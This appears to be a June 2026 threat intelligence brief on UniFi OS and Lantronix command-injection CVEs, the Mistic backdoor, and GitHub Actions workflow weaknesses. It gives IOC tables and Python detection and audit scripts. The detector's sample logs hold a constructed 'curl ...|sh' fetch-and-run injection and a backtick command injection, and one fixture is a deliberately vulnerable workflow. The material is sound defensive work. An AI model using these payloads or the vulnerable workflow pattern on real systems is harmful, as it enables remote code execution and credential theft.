Cyber Threat Brief — June 25 2026
1. Ubiquiti UniFi OS Triple CVSS 10 Chain — CVE-2026-34908 / 34909 / 34910
TL;DR: Three chained UniFi OS vulns (auth bypass + path traversal + command injection) give unauthenticated root RCE on UDM/Cloud Gateway devices. CISA KEV added June 23; federal deadline TOMORROW June 26.
What’s New:
- CISA KEV addition June 23 for all three CVEs with June 26 federal deadline
- CVE-2026-34908: NGINX auth bypass; a crafted request prefix matches an auth-exempt NGINX location and is then resolved to an authenticated internal route
- CVE-2026-34909: path traversal to read credentials and config files from underlying OS
- CVE-2026-34910: command injection via shell metacharacters in package name parameter
- ITW exploitation creates rogue admin accounts named “John Sim”; automated reconnaissance observed
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| Rogue admin account “John Sim” | Account IOC | T1136.001 | UniFi Controller logs | Hunt |
| NGINX auth-exempt prefix bypass requests | HTTP pattern | T1190 | WAF / reverse proxy | Block |
| Shell metacharacters in package name API param | Exploit pattern | T1059.004 | UniFi OS logs | Detect |
| UniFi OS < 5.0.8 | Vuln version | T1190 | Asset inventory | Patch |
| UDM/UDM-Pro/UDM-SE/Cloud Gateway < 5.1.12 | Vuln version | T1190 | Asset inventory | Patch |
| UniFi Express < 4.0.14 | Vuln version | T1190 | Asset inventory | Patch |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No rule for UniFi OS auth bypass or rogue admin creation |
| Elastic | None | No rule for UniFi OS exploitation |
| Sigma | None | No rule for UniFi OS exploitation |
Sources: CISA KEV Alert · SecurityWeek · BleepingComputer · Ubiquiti SA-064
2. Lantronix EDS5000 Root RCE — CVE-2025-67038
TL;DR: Unauthenticated OS command injection via unsanitized username in HTTP RPC auth logging gives root on serial-to-ethernet OT gateways. CISA KEV June 23; federal deadline TOMORROW June 26.
What’s New:
- CISA KEV addition June 23 with June 26 federal deadline
- HTTP RPC module concatenates username directly into shell command for failed auth logging
- Arbitrary OS commands injected via the username parameter execute as root; no authentication required
- Affects EDS5000 firmware 2.1.0.0R3; fixed in 2.2.0.0R1
- OT/ICS relevance: device manages serial IoT/OT equipment via ethernet
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| HTTP RPC auth endpoint (username param) | Exploit vector | T1190 | Network traffic / IDS | Block external access |
| EDS5000 firmware < 2.2.0.0R1 | Vuln version | T1190 | OT asset inventory | Patch |
| Shell metacharacters in username field | Exploit pattern | T1059.004 | HTTP proxy logs | Detect |
| Root-level process spawned by HTTP RPC service | Post-exploit | T1059.004 | Host logs | Hunt |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No rule for Lantronix EDS exploitation |
| Elastic | None | No rule for Lantronix EDS exploitation |
| Sigma | None | No rule for Lantronix EDS exploitation |
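Both the UniFi package-name injection (section 1) and the EDS5000 username injection (section 2) reduce to the same detection: shell metacharacters inside an HTTP parameter that the device later hands to a shell. The following is an added example, not code from Ubiquiti, Lantronix or the cited advisories. The request records are constructed, and the endpoint paths and parameter names (`/api/packages`, `name`, `/rpc/login`, `username`) are placeholders, since the brief does not name the real vulnerable routes. It decodes repeatedly so double-percent-encoded payloads are not missed.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed (method, path, form body) records standing in for UniFi OS / EDS5000 HTTP logs.
# Paths and parameter names are placeholders, not the actual vulnerable endpoints.
SAMPLE_REQUESTS = [
    ("POST", "/api/packages", "name=unifi-utils"),
    ("POST", "/api/packages", "name=unifi-utils%3Bcurl+198.51.100.7%7Csh"),
    ("POST", "/rpc/login", "username=alice&password=s3cret"),
    # double URL-encoded backticks: %2560 -> %60 -> `
    ("POST", "/rpc/login", "username=admin%2560id%2560&password=x"),
]

# Characters and sequences that terminate or extend a shell command when the
# parameter is concatenated into one (the T1059.004 metacharacter class).
# parse_qs already splits on '&', so a literal '&' after decoding was encoded on the wire.
SHELL_META = re.compile(r"[;|&`\n\r]|\$[({]")


def fully_decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding so %2560 is seen as a backtick."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_body(body):
    """Return [(param, decoded_value)] for every parameter carrying shell metacharacters."""
    hits = []
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for raw in values:  # parse_qs has already stripped one layer of encoding
            decoded = fully_decode(raw)
            if SHELL_META.search(decoded):
                hits.append((param, decoded))
    return hits


def scan_requests(records):
    """Apply scan_body to each (method, path, body) record and return the findings."""
    findings = []
    for method, path, body in records:
        for param, decoded in scan_body(body):
            findings.append({"method": method, "path": path, "param": param, "value": decoded})
    return findings


if __name__ == "__main__":
    for f in scan_requests(SAMPLE_REQUESTS):
        print(f"{f['method']} {f['path']} param={f['param']!r} value={f['value']!r}")
```

Run this over exported proxy or IDS request logs rather than on the device itself; neither product ships a hook for it. Expect false positives from legitimate values containing `|` or `;` (descriptions, URLs), so scope the rule to the auth and package-management endpoints once the vendor advisories name them.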
Sources: The Hacker News · CISA ICS Advisory · Security Affairs
3. Mistic Backdoor — KongTuke / Woodgnat IAB
TL;DR: New fileless backdoor from IAB KongTuke (linked to Qilin, Interlock, Rhysida, Akira, 8Base, Black Basta ransomware) sideloads via legitimate Microsoft binary. Symantec published full IOC set June 24.
What’s New:
- Symantec Threat Hunter disclosure June 24 with 9 file hashes and 30 network IOCs
- MpExtMs.exe (legit Microsoft binary) sideloads version.dll loader → loads EndpointDlp.dll (Mistic)
- Fileless payload stage: Mistic executes its payloads in memory; only the loader and backdoor DLLs (hashes below) touch disk. Includes a kill switch for self-deletion
- Delivered via ClickFix/CrashFix social engineering on compromised WordPress sites
- Persistence: Run keys masquerading as AnyDesk/Splashtop/Comms, startup shortcuts, scheduled tasks
- Co-deployed with ModeloRAT (WinPython-based RAT with RC4-encrypted C2)
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| 1e41c7bf…9d1984 (endpointdlp.dll) | SHA-256 | T1574.002 | EDR | Block |
| afd5f1ed…8ca5 (endpointdlp.dll) | SHA-256 | T1574.002 | EDR | Block |
| db972979…7383 (endpointdlp.dll) | SHA-256 | T1574.002 | EDR | Block |
| fb363082…d34a (endpointdlp.dll) | SHA-256 | T1574.002 | EDR | Block |
| 59e3c4cb…b4be (version.dll loader) | SHA-256 | T1574.002 | EDR | Block |
| 34d798a6…07bc (fake lock screen) | SHA-256 | T1056.002 | EDR | Block |
| authorized-logins[.]net | C2 domain | T1071.001 | DNS / proxy | Block |
| updater-worelos[.]com | C2 domain | T1071.001 | DNS / proxy | Block |
| upd-domain-goloro[.]com | C2 domain | T1071.001 | DNS / proxy | Block |
| sql-updater-service[.]com | C2 domain | T1071.001 | DNS / proxy | Block |
| human-check[.]top | C2 domain | T1071.001 | DNS / proxy | Block |
| thomphon[.]com | C2 domain | T1071.001 | DNS / proxy | Block |
| 142.93.242[.]144 | C2 IP | T1071.001 | Firewall | Block |
| 144.31.53[.]78 | C2 IP | T1071.001 | Firewall | Block |
| 198.13.159[.]44 | C2 IP | T1071.001 | Firewall | Block |
| 199.91.221[.]42 | C2 IP | T1071.001 | Firewall | Block |
| MpExtMs.exe loading EndpointDlp.dll | DLL sideload | T1574.002 | Sysmon EID 7 | Hunt |
| Run key: AnyDesk/Splashtop/Comms names | Persistence | T1547.001 | Registry | Hunt |
| pythonw.exe (signed, WinPython) running unknown scripts | ModeloRAT | T1059.006 | EDR | Hunt |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No rule for MpExtMs.exe sideloading or EndpointDlp.dll abuse |
| Elastic | Suspicious DLL Loaded via Side-Loading (generic) | Needs tuning for MpExtMs.exe + EndpointDlp.dll pair |
| Sigma | None | No rule for Mistic/KongTuke sideloading chain |
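The Sysmon EID 7 hunt in the table above, written out as an added example (not Symantec's or Broadcom's code). It works on exported image-load events, flagging `MpExtMs.exe` loading `version.dll` or `EndpointDlp.dll` unless both binary and DLL sit in a Microsoft directory and the DLL carries a valid Microsoft signature. The events are constructed; the Defender platform version in the benign event and the `C:\Users\Public\Comms` staging directory are placeholders, and the list of trusted directories is an assumption to tune for your estate. Hash matching is left out deliberately: the SHA-256 values in this brief are truncated and must be taken in full from the Symantec IOC set.

```python
import ntpath

# Constructed Sysmon Event ID 7 (ImageLoad) records, trimmed to the fields the hunt uses.
# Paths and the Defender platform version are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 7,
     "Image": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.0.0\\MpExtMs.exe",
     "ImageLoaded": "C:\\Windows\\System32\\version.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"EventID": 7,
     "Image": "C:\\Users\\Public\\Comms\\MpExtMs.exe",
     "ImageLoaded": "C:\\Users\\Public\\Comms\\version.dll",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
    {"EventID": 7,
     "Image": "C:\\Users\\Public\\Comms\\MpExtMs.exe",
     "ImageLoaded": "C:\\Users\\Public\\Comms\\EndpointDlp.dll",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
    {"EventID": 7,
     "Image": "C:\\Windows\\explorer.exe",
     "ImageLoaded": "C:\\Windows\\System32\\version.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
]

HOST_BINARY = "mpextms.exe"
SIDELOADED_DLLS = {"version.dll", "endpointdlp.dll"}
# Directories where Microsoft's own copies of these files are expected (assumption for this hunt).
TRUSTED_ROOTS = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\windows defender\\",
    "c:\\programdata\\microsoft\\windows defender\\platform\\",
)


def under_trusted_root(path):
    """ntpath.normcase lowercases and normalises separators on any host OS."""
    p = ntpath.normcase(path)
    return any(p.startswith(root) for root in TRUSTED_ROOTS)


def is_mistic_sideload(ev):
    """True for an ImageLoad event matching the MpExtMs.exe -> version.dll/EndpointDlp.dll chain."""
    if ev.get("EventID") != 7:
        return False
    if ntpath.basename(ev["Image"]).lower() != HOST_BINARY:
        return False
    if ntpath.basename(ev["ImageLoaded"]).lower() not in SIDELOADED_DLLS:
        return False
    # Benign only when a Microsoft binary in a Microsoft directory loads a validly
    # signed Microsoft DLL from a Microsoft directory; anything else is a hunt hit.
    benign = (under_trusted_root(ev["Image"])
              and under_trusted_root(ev["ImageLoaded"])
              and ev.get("SignatureStatus") == "Valid"
              and "microsoft" in ev.get("Signature", "").lower())
    return not benign


def hunt_sideload(events):
    """Return the events that match the sideloading chain."""
    return [ev for ev in events if is_mistic_sideload(ev)]


if __name__ == "__main__":
    for ev in hunt_sideload(SAMPLE_EVENTS):
        print(f"SIDELOAD {ev['Image']} -> {ev['ImageLoaded']} ({ev['SignatureStatus']})")
```

EID 7 is only emitted when image-load logging is enabled in the Sysmon configuration, and it is high volume; include a rule that logs image loads for `MpExtMs.exe` specifically rather than relying on a blanket ImageLoad setting.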
Sources: Symantec/Broadcom · Zscaler MLTBackdoor · BleepingComputer
4. Cordyceps — Systemic CI/CD Workflow Exploitation
TL;DR: Novee Security disclosed a class of GitHub Actions workflow weaknesses that let any outside GitHub account, with no org membership or repository permissions, hijack builds, steal credentials, and compromise supply chains at 300+ confirmed repos including Microsoft, Google, Apache, and Cloudflare.
What’s New:
- Novee Security disclosure published June 24; 654 repos flagged, 300+ confirmed fully exploitable
- Exploit patterns: command injection in workflow expressions, broken auth logic on PR triggers, artifact poisoning, cross-workflow privilege escalation
- Any free GitHub account can exploit — no org membership required
- AI coding agents reproduce vulnerable CI/CD patterns at scale across millions of repos
- Fixes confirmed at dozens of orgs including Microsoft, Google, Apache, Cloudflare, Python Software Foundation
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| pull_request_target workflows that check out the PR head ref | Vuln workflow pattern | T1195.002 | GitHub Actions YAML | Audit |
| Workflow run: steps with ${{ }} expressions interpolating attacker-controlled event data | Command injection | T1059 | GitHub Actions YAML | Audit |
| PRs from forks triggering privileged workflows | Auth bypass | T1078 | GitHub audit log | Alert |
| GITHUB_TOKEN or secrets exposed in workflow logs | Credential leak | T1552.001 | GitHub audit log | Hunt |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No CI/CD workflow abuse detection |
| Elastic | None | No CI/CD workflow abuse detection |
| Sigma | None | No CI/CD workflow abuse detection |
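Since none of the rule sets above cover CI/CD workflow abuse, here is an added audit example for the two patterns in the Actionable Intel table (expression injection into `run:` steps, and `pull_request_target` checking out the PR head). It is not Novee Security's tooling. The two workflows are constructed, one vulnerable and one with the usual fixes applied; the list of untrusted event fields is a heuristic, not exhaustive; and the indentation-based scan of `run:` block scalars is a shortcut for a YAML parser that is adequate for this check but not for every workflow layout.

```python
import re

# Constructed GitHub Actions workflows: one carrying both weaknesses from the brief,
# one with the fixes applied. Neither is taken from a real repository.
VULN_WORKFLOW = """\
name: PR triage
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: |
          echo "Title: ${{ github.event.pull_request.title }}"
          ./ci/lint.sh
"""

SAFE_WORKFLOW = """\
name: PR triage
on:
  pull_request:
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          persist-credentials: false
      - env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: |
          echo "Title: $PR_TITLE"
          ./ci/lint.sh
"""

# Event fields an outside contributor controls (heuristic list, not exhaustive).
UNTRUSTED_CONTEXT = re.compile(
    r"github\.(?:head_ref|event\.(?:"
    r"issue\.(?:title|body)|pull_request\.(?:title|body|head\.(?:ref|label))|"
    r"comment\.body|review\.body|review_comment\.body|"
    r"head_commit\.(?:message|author\.(?:name|email))|"
    r"commits\[[^\]]*\]\.(?:message|author\.(?:name|email))))"
)
EXPRESSION = re.compile(r"\$\{\{(.*?)\}\}")
RUN_KEY = re.compile(r"^(\s*(?:-\s+)?)run:\s*(.*)$")
PR_HEAD_CHECKOUT = re.compile(
    r"^\s*ref:\s*\$\{\{\s*(?:github\.event\.pull_request\.head\.(?:sha|ref)|github\.head_ref)\b",
    re.M)
PRT_TRIGGER = re.compile(r"^\s*pull_request_target\s*:", re.M)


def run_blocks(text):
    """Yield (line_no, script) per run: step; block scalar bodies are gathered by indentation."""
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        if not m:
            i += 1
            continue
        key_col, start = len(m.group(1)), i
        script = [m.group(2)]
        i += 1
        while i < len(lines) and (not lines[i].strip()
                                  or len(lines[i]) - len(lines[i].lstrip()) > key_col):
            script.append(lines[i])
            i += 1
        yield start + 1, "\n".join(script)


def audit_workflow(text):
    """Return human-readable findings for the two Cordyceps-style patterns."""
    findings = []
    for line_no, script in run_blocks(text):
        for expr in EXPRESSION.findall(script):
            if UNTRUSTED_CONTEXT.search(expr):
                findings.append(f"line {line_no}: run step interpolates untrusted "
                                + "${{ " + expr.strip() + " }}")
    if PRT_TRIGGER.search(text) and PR_HEAD_CHECKOUT.search(text):
        findings.append("pull_request_target workflow checks out the PR head: "
                        "fork code runs with a write token and repository secrets")
    return findings


if __name__ == "__main__":
    for name, wf in (("vulnerable", VULN_WORKFLOW), ("hardened", SAFE_WORKFLOW)):
        print(name, audit_workflow(wf) or "no findings")
```

The hardened workflow shows the two fixes in one place: the PR title reaches the shell through an environment variable (`$PR_TITLE`), so the expression is expanded by the runner into env and never rewritten into the script text, and the job runs on `pull_request` with `persist-credentials: false`, so a fork's PR gets neither a write-capable `GITHUB_TOKEN` nor secrets.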
Sources: Novee Security Blog · The Hacker News · SecurityWeek · Dark Reading
Status Updates
- CVE-2026-20230 (Cisco Unified CM SSRF): Active exploitation confirmed June 21-22 per Defused Cyber; single attacker using file:// payloads for recon file writes. Original brief.
- CVE-2026-50656 (Windows Defender RoguePlanet): Still UNPATCHED zero-day. Microsoft confirmed working on fix since June 16, no timeline. Original brief.
- CVE-2026-20253 (Splunk Enterprise PostgreSQL Sidecar): Federal deadline passed June 21. Active ITW exploitation ongoing. No workarounds — upgrade to 10.4.0/10.2.4/10.0.7. Original brief.